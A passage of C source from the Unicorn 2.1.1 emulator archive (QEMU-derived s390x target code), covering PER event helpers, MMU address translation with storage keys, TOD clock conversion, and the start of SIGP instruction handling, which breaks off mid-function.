(env->per_perc_atmid) { tcg_s390_program_interrupt(env, PGM_PER, GETPC()); } } /* Check if an address is within the PER starting address and the PER ending address. The address range might loop. */ static inline bool get_per_in_range(CPUS390XState *env, uint64_t addr) { if (env->cregs[10] <= env->cregs[11]) { return env->cregs[10] <= addr && addr <= env->cregs[11]; } else { return env->cregs[10] <= addr || addr <= env->cregs[11]; } } void HELPER(per_branch)(CPUS390XState *env, uint64_t from, uint64_t to) { if ((env->cregs[9] & PER_CR9_EVENT_BRANCH)) { if (!(env->cregs[9] & PER_CR9_CONTROL_BRANCH_ADDRESS) || get_per_in_range(env, to)) { env->per_address = from; env->per_perc_atmid = PER_CODE_EVENT_BRANCH | get_per_atmid(env); } } } void HELPER(per_ifetch)(CPUS390XState *env, uint64_t addr) { if ((env->cregs[9] & PER_CR9_EVENT_IFETCH) && get_per_in_range(env, addr)) { env->per_address = addr; env->per_perc_atmid = PER_CODE_EVENT_IFETCH | get_per_atmid(env); /* If the instruction has to be nullified, trigger the exception immediately. */ if (env->cregs[9] & PER_CR9_EVENT_NULLIFICATION) { CPUState *cs = env_cpu(env); env->per_perc_atmid |= PER_CODE_EVENT_NULLIFICATION; env->int_pgm_code = PGM_PER; env->int_pgm_ilen = get_ilen(cpu_ldub_code(env, addr)); cs->exception_index = EXCP_PGM; cpu_loop_exit(cs); } } } void HELPER(per_store_real)(CPUS390XState *env) { if ((env->cregs[9] & PER_CR9_EVENT_STORE) && (env->cregs[9] & PER_CR9_EVENT_STORE_REAL)) { /* PSW is saved just before calling the helper. */ env->per_address = env->psw.addr; env->per_perc_atmid = PER_CODE_EVENT_STORE_REAL | get_per_atmid(env); } } static uint8_t stfl_bytes[2048]; static unsigned int used_stfl_bytes; static void prepare_stfl(void) { #if 0 static bool initialized; int i; /* racy, but we don't care, the same values are always written */ if (initialized) { return; } s390_get_feat_block(S390_FEAT_TYPE_STFL, stfl_bytes); for (i = 0; i < sizeof(stfl_bytes); i++) { if (stfl_bytes[i]) { used_stfl_bytes = i + 1; } } initialized = true; #endif } void HELPER(stfl)(CPUS390XState *env) { LowCore *lowcore; lowcore = cpu_map_lowcore(env); prepare_stfl(); memcpy(&lowcore->stfl_fac_list, stfl_bytes, sizeof(lowcore->stfl_fac_list)); cpu_unmap_lowcore(env, lowcore); } uint32_t HELPER(stfle)(CPUS390XState *env, uint64_t addr) { const uintptr_t ra = GETPC(); const int count_bytes = ((env->regs[0] & 0xff) + 1) * 8; int max_bytes; int i; if (addr & 0x7) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } prepare_stfl(); max_bytes = ROUND_UP(used_stfl_bytes, 8); /* * The PoP says that doublewords beyond the highest-numbered facility * bit may or may not be stored. However, existing hardware appears to * not store the words, and existing software depend on that. */ for (i = 0; i < MIN(count_bytes, max_bytes); ++i) { cpu_stb_data_ra(env, addr + i, stfl_bytes[i], ra); } env->regs[0] = deposit64(env->regs[0], 0, 8, (max_bytes / 8) - 1); return count_bytes >= max_bytes ? 0 : 3; } /* * Note: we ignore any return code of the functions called for the pci * instructions, as the only time they return !0 is when the stub is * called, and in that case we didn't even offer the zpci facility. * The only exception is SIC, where program checks need to be handled * by the caller. */ void HELPER(clp)(CPUS390XState *env, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); clp_service_call(cpu, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(pcilg)(CPUS390XState *env, uint32_t r1, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); pcilg_service_call(cpu, r1, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(pcistg)(CPUS390XState *env, uint32_t r1, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); pcistg_service_call(cpu, r1, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(stpcifc)(CPUS390XState *env, uint32_t r1, uint64_t fiba, uint32_t ar) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); stpcifc_service_call(cpu, r1, fiba, ar, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(sic)(CPUS390XState *env, uint64_t r1, uint64_t r3) { #if 0 int r; qemu_mutex_lock_iothread(); r = css_do_sic(env, (r3 >> 27) & 0x7, r1 & 0xffff); qemu_mutex_unlock_iothread(); /* css_do_sic() may actually return a PGM_xxx value to inject */ if (r) { tcg_s390_program_interrupt(env, -r, GETPC()); } #endif } void HELPER(rpcit)(CPUS390XState *env, uint32_t r1, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); rpcit_service_call(cpu, r1, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(pcistb)(CPUS390XState *env, uint32_t r1, uint32_t r3, uint64_t gaddr, uint32_t ar) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); pcistb_service_call(cpu, r1, r3, gaddr, ar, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(mpcifc)(CPUS390XState *env, uint32_t r1, uint64_t fiba, uint32_t ar) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); mpcifc_service_call(cpu, r1, fiba, ar, GETPC()); qemu_mutex_unlock_iothread(); #endif } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/mmu_helper.c��������������������������������������������������������0000664�0000000�0000000�00000043406�14675241067�0020637�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S390x MMU related functions * * Copyright (c) 2011 Alexander Graf * Copyright (c) 2015 Thomas Huth, IBM Corporation * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #include "qemu/osdep.h" //#include "exec/address-spaces.h" #include "cpu.h" #include "internal.h" #include "sysemu/tcg.h" #include "exec/exec-all.h" //#include "hw/hw.h" #include "hw/s390x/storage-keys.h" /* Fetch/store bits in the translation exception code: */ #define FS_READ 0x800 #define FS_WRITE 0x400 static void trigger_access_exception(CPUS390XState *env, uint32_t type, uint64_t tec) { CPUState *cs = env_cpu(env); if (type != PGM_ADDRESSING) { #ifdef UNICORN_ARCH_POSTFIX glue(stq_phys, UNICORN_ARCH_POSTFIX)(env->uc, cs->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #else stq_phys(env->uc, cs->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #endif } trigger_pgm_exception(env, type); } /* check whether the address would be proteted by Low-Address Protection */ static bool is_low_address(uint64_t addr) { return addr <= 511 || (addr >= 4096 && addr <= 4607); } /* check whether Low-Address Protection is enabled for mmu_translate() */ static bool lowprot_enabled(const CPUS390XState *env, uint64_t asc) { if (!(env->cregs[0] & CR0_LOWPROT)) { return false; } if (!(env->psw.mask & PSW_MASK_DAT)) { return true; } /* Check the private-space control bit */ switch (asc) { case PSW_ASC_PRIMARY: return !(env->cregs[1] & ASCE_PRIVATE_SPACE); case PSW_ASC_SECONDARY: return !(env->cregs[7] & ASCE_PRIVATE_SPACE); case PSW_ASC_HOME: return !(env->cregs[13] & ASCE_PRIVATE_SPACE); default: /* We don't support access register mode */ // error_report("unsupported addressing mode"); exit(1); } } /** * Translate real address to absolute (= physical) * address by taking care of the prefix mapping. */ target_ulong mmu_real2abs(CPUS390XState *env, target_ulong raddr) { if (raddr < 0x2000) { return raddr + env->psa; /* Map the lowcore. */ } else if (raddr >= env->psa && raddr < env->psa + 0x2000) { return raddr - env->psa; /* Map the 0 page. */ } return raddr; } static inline bool read_table_entry(CPUS390XState *env, hwaddr gaddr, uint64_t *entry) { CPUState *cs = env_cpu(env); /* * According to the PoP, these table addresses are "unpredictably real * or absolute". Also, "it is unpredictable whether the address wraps * or an addressing exception is recognized". * * We treat them as absolute addresses and don't wrap them. */ if (unlikely(address_space_read(cs->as, gaddr, MEMTXATTRS_UNSPECIFIED, entry, sizeof(*entry)) != MEMTX_OK)) { return false; } *entry = be64_to_cpu(*entry); return true; } static int mmu_translate_asce(CPUS390XState *env, target_ulong vaddr, uint64_t asc, uint64_t asce, target_ulong *raddr, int *flags, int rw) { const bool edat1 = (env->cregs[0] & CR0_EDAT) && s390_has_feat(env->uc, S390_FEAT_EDAT); const bool edat2 = edat1 && s390_has_feat(env->uc, S390_FEAT_EDAT_2); const bool iep = (env->cregs[0] & CR0_IEP) && s390_has_feat(env->uc, S390_FEAT_INSTRUCTION_EXEC_PROT); const int asce_tl = asce & ASCE_TABLE_LENGTH; const int asce_p = asce & ASCE_PRIVATE_SPACE; hwaddr gaddr = asce & ASCE_ORIGIN; uint64_t entry; if (asce & ASCE_REAL_SPACE) { /* direct mapping */ *raddr = vaddr; return 0; } switch (asce & ASCE_TYPE_MASK) { case ASCE_TYPE_REGION1: if (VADDR_REGION1_TL(vaddr) > asce_tl) { return PGM_REG_FIRST_TRANS; } gaddr += VADDR_REGION1_TX(vaddr) * 8; break; case ASCE_TYPE_REGION2: if (VADDR_REGION1_TX(vaddr)) { return PGM_ASCE_TYPE; } if (VADDR_REGION2_TL(vaddr) > asce_tl) { return PGM_REG_SEC_TRANS; } gaddr += VADDR_REGION2_TX(vaddr) * 8; break; case ASCE_TYPE_REGION3: if (VADDR_REGION1_TX(vaddr) || VADDR_REGION2_TX(vaddr)) { return PGM_ASCE_TYPE; } if (VADDR_REGION3_TL(vaddr) > asce_tl) { return PGM_REG_THIRD_TRANS; } gaddr += VADDR_REGION3_TX(vaddr) * 8; break; case ASCE_TYPE_SEGMENT: if (VADDR_REGION1_TX(vaddr) || VADDR_REGION2_TX(vaddr) || VADDR_REGION3_TX(vaddr)) { return PGM_ASCE_TYPE; } if (VADDR_SEGMENT_TL(vaddr) > asce_tl) { return PGM_SEGMENT_TRANS; } gaddr += VADDR_SEGMENT_TX(vaddr) * 8; break; } switch (asce & ASCE_TYPE_MASK) { case ASCE_TYPE_REGION1: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & REGION_ENTRY_I) { return PGM_REG_FIRST_TRANS; } if ((entry & REGION_ENTRY_TT) != REGION_ENTRY_TT_REGION1) { return PGM_TRANS_SPEC; } if (VADDR_REGION2_TL(vaddr) < (entry & REGION_ENTRY_TF) >> 6 || VADDR_REGION2_TL(vaddr) > (entry & REGION_ENTRY_TL)) { return PGM_REG_SEC_TRANS; } if (edat1 && (entry & REGION_ENTRY_P)) { *flags &= ~PAGE_WRITE; } gaddr = (entry & REGION_ENTRY_ORIGIN) + VADDR_REGION2_TX(vaddr) * 8; /* fall through */ case ASCE_TYPE_REGION2: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & REGION_ENTRY_I) { return PGM_REG_SEC_TRANS; } if ((entry & REGION_ENTRY_TT) != REGION_ENTRY_TT_REGION2) { return PGM_TRANS_SPEC; } if (VADDR_REGION3_TL(vaddr) < (entry & REGION_ENTRY_TF) >> 6 || VADDR_REGION3_TL(vaddr) > (entry & REGION_ENTRY_TL)) { return PGM_REG_THIRD_TRANS; } if (edat1 && (entry & REGION_ENTRY_P)) { *flags &= ~PAGE_WRITE; } gaddr = (entry & REGION_ENTRY_ORIGIN) + VADDR_REGION3_TX(vaddr) * 8; /* fall through */ case ASCE_TYPE_REGION3: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & REGION_ENTRY_I) { return PGM_REG_THIRD_TRANS; } if ((entry & REGION_ENTRY_TT) != REGION_ENTRY_TT_REGION3) { return PGM_TRANS_SPEC; } if (edat2 && (entry & REGION3_ENTRY_CR) && asce_p) { return PGM_TRANS_SPEC; } if (edat1 && (entry & REGION_ENTRY_P)) { *flags &= ~PAGE_WRITE; } if (edat2 && (entry & REGION3_ENTRY_FC)) { if (iep && (entry & REGION3_ENTRY_IEP)) { *flags &= ~PAGE_EXEC; } *raddr = (entry & REGION3_ENTRY_RFAA) | (vaddr & ~REGION3_ENTRY_RFAA); return 0; } if (VADDR_SEGMENT_TL(vaddr) < (entry & REGION_ENTRY_TF) >> 6 || VADDR_SEGMENT_TL(vaddr) > (entry & REGION_ENTRY_TL)) { return PGM_SEGMENT_TRANS; } gaddr = (entry & REGION_ENTRY_ORIGIN) + VADDR_SEGMENT_TX(vaddr) * 8; /* fall through */ case ASCE_TYPE_SEGMENT: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & SEGMENT_ENTRY_I) { return PGM_SEGMENT_TRANS; } if ((entry & SEGMENT_ENTRY_TT) != SEGMENT_ENTRY_TT_SEGMENT) { return PGM_TRANS_SPEC; } if ((entry & SEGMENT_ENTRY_CS) && asce_p) { return PGM_TRANS_SPEC; } if (entry & SEGMENT_ENTRY_P) { *flags &= ~PAGE_WRITE; } if (edat1 && (entry & SEGMENT_ENTRY_FC)) { if (iep && (entry & SEGMENT_ENTRY_IEP)) { *flags &= ~PAGE_EXEC; } *raddr = (entry & SEGMENT_ENTRY_SFAA) | (vaddr & ~SEGMENT_ENTRY_SFAA); return 0; } gaddr = (entry & SEGMENT_ENTRY_ORIGIN) + VADDR_PAGE_TX(vaddr) * 8; break; } if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & PAGE_ENTRY_I) { return PGM_PAGE_TRANS; } if (entry & PAGE_ENTRY_0) { return PGM_TRANS_SPEC; } if (entry & PAGE_ENTRY_P) { *flags &= ~PAGE_WRITE; } if (iep && (entry & PAGE_ENTRY_IEP)) { *flags &= ~PAGE_EXEC; } *raddr = entry & TARGET_PAGE_MASK; return 0; } static void mmu_handle_skey(uc_engine *uc, target_ulong addr, int rw, int *flags) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint8_t key; int rc; #if 0 if (unlikely(addr >= ram_size)) { return; } #endif /* * Whenever we create a new TLB entry, we set the storage key reference * bit. In case we allow write accesses, we set the storage key change * bit. Whenever the guest changes the storage key, we have to flush the * TLBs of all CPUs (the whole TLB or all affected entries), so that the * next reference/change will result in an MMU fault and make us properly * update the storage key here. * * Note 1: "record of references ... is not necessarily accurate", * "change bit may be set in case no storing has occurred". * -> We can set reference/change bits even on exceptions. * Note 2: certain accesses seem to ignore storage keys. For example, * DAT translation does not set reference bits for table accesses. * * TODO: key-controlled protection. Only CPU accesses make use of the * PSW key. CSS accesses are different - we have to pass in the key. * * TODO: we have races between getting and setting the key. */ rc = skeyclass->get_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key); if (rc) { // trace_get_skeys_nonzero(rc); return; } switch (rw) { case MMU_DATA_LOAD: case MMU_INST_FETCH: /* * The TLB entry has to remain write-protected on read-faults if * the storage key does not indicate a change already. Otherwise * we might miss setting the change bit on write accesses. */ if (!(key & SK_C)) { *flags &= ~PAGE_WRITE; } break; case MMU_DATA_STORE: key |= SK_C; break; default: g_assert_not_reached(); } /* Any store/fetch sets the reference bit */ key |= SK_R; rc = skeyclass->set_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key); if (rc) { // trace_set_skeys_nonzero(rc); } } /** * Translate a virtual (logical) address into a physical (absolute) address. * @param vaddr the virtual address * @param rw 0 = read, 1 = write, 2 = code fetch * @param asc address space control (one of the PSW_ASC_* modes) * @param raddr the translated address is stored to this pointer * @param flags the PAGE_READ/WRITE/EXEC flags are stored to this pointer * @param exc true = inject a program check if a fault occurred * @return 0 = success, != 0, the exception to raise */ int mmu_translate(CPUS390XState *env, target_ulong vaddr, int rw, uint64_t asc, target_ulong *raddr, int *flags, uint64_t *tec) { uint64_t asce; int r; *tec = (vaddr & TARGET_PAGE_MASK) | (asc >> 46) | (rw == MMU_DATA_STORE ? FS_WRITE : FS_READ); *flags = PAGE_READ | PAGE_WRITE | PAGE_EXEC; if (is_low_address(vaddr & TARGET_PAGE_MASK) && lowprot_enabled(env, asc)) { /* * If any part of this page is currently protected, make sure the * TLB entry will not be reused. * * As the protected range is always the first 512 bytes of the * two first pages, we are able to catch all writes to these areas * just by looking at the start address (triggering the tlb miss). */ *flags |= PAGE_WRITE_INV; if (is_low_address(vaddr) && rw == MMU_DATA_STORE) { /* LAP sets bit 56 */ *tec |= 0x80; return PGM_PROTECTION; } } vaddr &= TARGET_PAGE_MASK; if (!(env->psw.mask & PSW_MASK_DAT)) { *raddr = vaddr; goto nodat; } switch (asc) { case PSW_ASC_PRIMARY: asce = env->cregs[1]; break; case PSW_ASC_HOME: asce = env->cregs[13]; break; case PSW_ASC_SECONDARY: asce = env->cregs[7]; break; case PSW_ASC_ACCREG: default: // hw_error("guest switched to unknown asc mode\n"); break; } /* perform the DAT translation */ r = mmu_translate_asce(env, vaddr, asc, asce, raddr, flags, rw); if (unlikely(r)) { return r; } /* check for DAT protection */ if (unlikely(rw == MMU_DATA_STORE && !(*flags & PAGE_WRITE))) { /* DAT sets bit 61 only */ *tec |= 0x4; return PGM_PROTECTION; } /* check for Instruction-Execution-Protection */ if (unlikely(rw == MMU_INST_FETCH && !(*flags & PAGE_EXEC))) { /* IEP sets bit 56 and 61 */ *tec |= 0x84; return PGM_PROTECTION; } nodat: /* Convert real address -> absolute address */ *raddr = mmu_real2abs(env, *raddr); mmu_handle_skey(env->uc, *raddr, rw, flags); return 0; } /** * translate_pages: Translate a set of consecutive logical page addresses * to absolute addresses. This function is used for TCG and old KVM without * the MEMOP interface. */ static int translate_pages(S390CPU *cpu, vaddr addr, int nr_pages, target_ulong *pages, bool is_write, uint64_t *tec) { uint64_t asc = cpu->env.psw.mask & PSW_MASK_ASC; CPUS390XState *env = &cpu->env; int ret, i, pflags; for (i = 0; i < nr_pages; i++) { ret = mmu_translate(env, addr, is_write, asc, &pages[i], &pflags, tec); if (ret) { return ret; } if (!address_space_access_valid(env_cpu(env)->as, pages[i], TARGET_PAGE_SIZE, is_write, MEMTXATTRS_UNSPECIFIED)) { *tec = 0; /* unused */ return PGM_ADDRESSING; } addr += TARGET_PAGE_SIZE; } return 0; } /** * s390_cpu_virt_mem_rw: * @laddr: the logical start address * @ar: the access register number * @hostbuf: buffer in host memory. NULL = do only checks w/o copying * @len: length that should be transferred * @is_write: true = write, false = read * Returns: 0 on success, non-zero if an exception occurred * * Copy from/to guest memory using logical addresses. Note that we inject a * program interrupt in case there is an error while accessing the memory. * * This function will always return (also for TCG), make sure to call * s390_cpu_virt_mem_handle_exc() to properly exit the CPU loop. */ int s390_cpu_virt_mem_rw(S390CPU *cpu, vaddr laddr, uint8_t ar, void *hostbuf, int len, bool is_write) { int currlen, nr_pages, i; target_ulong *pages; uint64_t tec; int ret; CPUS390XState *env = &cpu->env; nr_pages = (((laddr & ~TARGET_PAGE_MASK) + len - 1) >> TARGET_PAGE_BITS) + 1; pages = g_malloc(nr_pages * sizeof(*pages)); ret = translate_pages(cpu, laddr, nr_pages, pages, is_write, &tec); if (ret) { trigger_access_exception(&cpu->env, ret, tec); } else if (hostbuf != NULL) { /* Copy data by stepping through the area page by page */ for (i = 0; i < nr_pages; i++) { currlen = MIN(len, TARGET_PAGE_SIZE - (laddr % TARGET_PAGE_SIZE)); cpu_physical_memory_rw(env_cpu(env)->as, pages[i] | (laddr & ~TARGET_PAGE_MASK), hostbuf, currlen, is_write); laddr += currlen; hostbuf = (void *)(((char *)hostbuf) + currlen); len -= currlen; } } g_free(pages); return ret; } void s390_cpu_virt_mem_handle_exc(S390CPU *cpu, uintptr_t ra) { /* KVM will handle the interrupt automatically, TCG has to exit the TB */ cpu_loop_exit_restore(CPU(cpu), ra); } /** * Translate a real address into a physical (absolute) address. * @param raddr the real address * @param rw 0 = read, 1 = write, 2 = code fetch * @param addr the translated address is stored to this pointer * @param flags the PAGE_READ/WRITE/EXEC flags are stored to this pointer * @return 0 = success, != 0, the exception to raise */ int mmu_translate_real(CPUS390XState *env, target_ulong raddr, int rw, target_ulong *addr, int *flags, uint64_t *tec) { const bool lowprot_enabled = env->cregs[0] & CR0_LOWPROT; *flags = PAGE_READ | PAGE_WRITE | PAGE_EXEC; if (is_low_address(raddr & TARGET_PAGE_MASK) && lowprot_enabled) { /* see comment in mmu_translate() how this works */ *flags |= PAGE_WRITE_INV; if (is_low_address(raddr) && rw == MMU_DATA_STORE) { /* LAP sets bit 56 */ *tec = (raddr & TARGET_PAGE_MASK) | FS_WRITE | 0x80; return PGM_PROTECTION; } } *addr = mmu_real2abs(env, raddr & TARGET_PAGE_MASK); mmu_handle_skey(env->uc, *addr, rw, flags); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/s390-tod.h����������������������������������������������������������0000664�0000000�0000000�00000001317�14675241067�0017764�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TOD (Time Of Day) clock * * Copyright 2018 Red Hat, Inc. * Author(s): David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef TARGET_S390_TOD_H #define TARGET_S390_TOD_H /* The value of the TOD clock for 1.1.1970. */ #define TOD_UNIX_EPOCH 0x7d91048bca000000ULL /* Converts ns to s390's clock format */ static inline uint64_t time2tod(uint64_t ns) { return (ns << 9) / 125 + (((ns & 0xff80000000000000ull) / 125) << 9); } /* Converts s390's clock format to ns */ static inline uint64_t tod2time(uint64_t t) { return ((t >> 9) * 125) + (((t & 0x1ff) * 125) >> 9); } #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/sigp.c��������������������������������������������������������������0000664�0000000�0000000�00000033161�14675241067�0017441�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390x SIGP instruction handling * * Copyright (c) 2009 Alexander Graf <agraf@suse.de> * Copyright IBM Corp. 2012 * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" //#include "exec/address-spaces.h" #include "exec/exec-all.h" #include "sysemu/tcg.h" typedef struct SigpInfo { uint64_t param; int cc; uint64_t *status_reg; } SigpInfo; // static void set_sigp_status(SigpInfo *si, uint64_t status) // { // *si->status_reg &= 0xffffffff00000000ULL; // *si->status_reg |= status; // si->cc = SIGP_CC_STATUS_STORED; // } // static void sigp_sense(S390CPU *dst_cpu, SigpInfo *si) // { // uint8_t state = s390_cpu_get_state(dst_cpu); // bool ext_call = dst_cpu->env.pending_int & INTERRUPT_EXTERNAL_CALL; // uint64_t status = 0; // /* sensing without locks is racy, but it's the same for real hw */ // if (state != S390_CPU_STATE_STOPPED && !ext_call) { // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } else { // if (ext_call) { // status |= SIGP_STAT_EXT_CALL_PENDING; // } // if (state == S390_CPU_STATE_STOPPED) { // status |= SIGP_STAT_STOPPED; // } // set_sigp_status(si, status); // } // } // static void sigp_external_call(S390CPU *src_cpu, S390CPU *dst_cpu, SigpInfo *si) // { // int ret; // ret = cpu_inject_external_call(dst_cpu, src_cpu->env.core_id); // if (!ret) { // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } else { // set_sigp_status(si, SIGP_STAT_EXT_CALL_PENDING); // } // } // static void sigp_emergency(S390CPU *src_cpu, S390CPU *dst_cpu, SigpInfo *si) // { // cpu_inject_emergency_signal(dst_cpu, src_cpu->env.core_id); // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } #if 0 static void sigp_start(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; return; } s390_cpu_set_state(S390_CPU_STATE_OPERATING, cpu); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_stop(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; if (s390_cpu_get_state(cpu) != S390_CPU_STATE_OPERATING) { si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; return; } /* disabled wait - sleeping in user space */ if (cs->halted) { s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu); } else { /* execute the stop function */ cpu->env.sigp_order = SIGP_STOP; cpu_inject_stop(cpu); } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_stop_and_store_status(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; /* disabled wait - sleeping in user space */ if (s390_cpu_get_state(cpu) == S390_CPU_STATE_OPERATING && cs->halted) { s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu); } switch (s390_cpu_get_state(cpu)) { case S390_CPU_STATE_OPERATING: cpu->env.sigp_order = SIGP_STOP_STORE_STATUS; cpu_inject_stop(cpu); /* store will be performed in do_stop_interrup() */ break; case S390_CPU_STATE_STOPPED: /* already stopped, just store the status */ // cpu_synchronize_state(cs); s390_store_status(cpu, S390_STORE_STATUS_DEF_ADDR, true); break; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_store_status_at_address(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; uint32_t address = si->param & 0x7ffffe00u; /* cpu has to be stopped */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); return; } // cpu_synchronize_state(cs); if (s390_store_status(cpu, address, false)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } #define ADTL_SAVE_LC_MASK 0xfUL static void sigp_store_adtl_status(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; uint8_t lc = si->param & ADTL_SAVE_LC_MASK; hwaddr addr = si->param & ~ADTL_SAVE_LC_MASK; hwaddr len = 1UL << (lc ? lc : 10); if (!s390_has_feat(S390_FEAT_VECTOR) && !s390_has_feat(S390_FEAT_GUARDED_STORAGE)) { set_sigp_status(si, SIGP_STAT_INVALID_ORDER); return; } /* cpu has to be stopped */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); return; } /* address must be aligned to length */ if (addr & (len - 1)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } /* no GS: only lc == 0 is valid */ if (!s390_has_feat(S390_FEAT_GUARDED_STORAGE) && lc != 0) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } /* GS: 0, 10, 11, 12 are valid */ if (s390_has_feat(S390_FEAT_GUARDED_STORAGE) && lc != 0 && lc != 10 && lc != 11 && lc != 12) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } // cpu_synchronize_state(cs); if (s390_store_adtl_status(cpu, addr, len)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_restart(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); SigpInfo *si = arg.host_ptr; switch (s390_cpu_get_state(cpu)) { case S390_CPU_STATE_STOPPED: /* the restart irq has to be delivered prior to any other pending irq */ // cpu_synchronize_state(cs); /* * Set OPERATING (and unhalting) before loading the restart PSW. * load_psw() will then properly halt the CPU again if necessary (TCG). */ s390_cpu_set_state(S390_CPU_STATE_OPERATING, cpu); do_restart_interrupt(&cpu->env); break; case S390_CPU_STATE_OPERATING: cpu_inject_restart(cpu); break; } si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_initial_cpu_reset(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); S390CPUClass *scc = S390_CPU_GET_CLASS(cpu); SigpInfo *si = arg.host_ptr; // cpu_synchronize_state(cs); scc->reset(cs, S390_CPU_RESET_INITIAL); // cpu_synchronize_post_reset(cs); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_cpu_reset(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); S390CPUClass *scc = S390_CPU_GET_CLASS(cpu); SigpInfo *si = arg.host_ptr; // cpu_synchronize_state(cs); scc->reset(cs, S390_CPU_RESET_NORMAL); // cpu_synchronize_post_reset(cs); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } static void sigp_set_prefix(CPUState *cs, run_on_cpu_data arg) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; SigpInfo *si = arg.host_ptr; uint32_t addr = si->param & 0x7fffe000u; // cpu_synchronize_state(cs); if (!address_space_access_valid(env_cpu(env)->as, addr, sizeof(struct LowCore), false, MEMTXATTRS_UNSPECIFIED)) { set_sigp_status(si, SIGP_STAT_INVALID_PARAMETER); return; } /* cpu has to be stopped */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_STOPPED) { set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); return; } cpu->env.psa 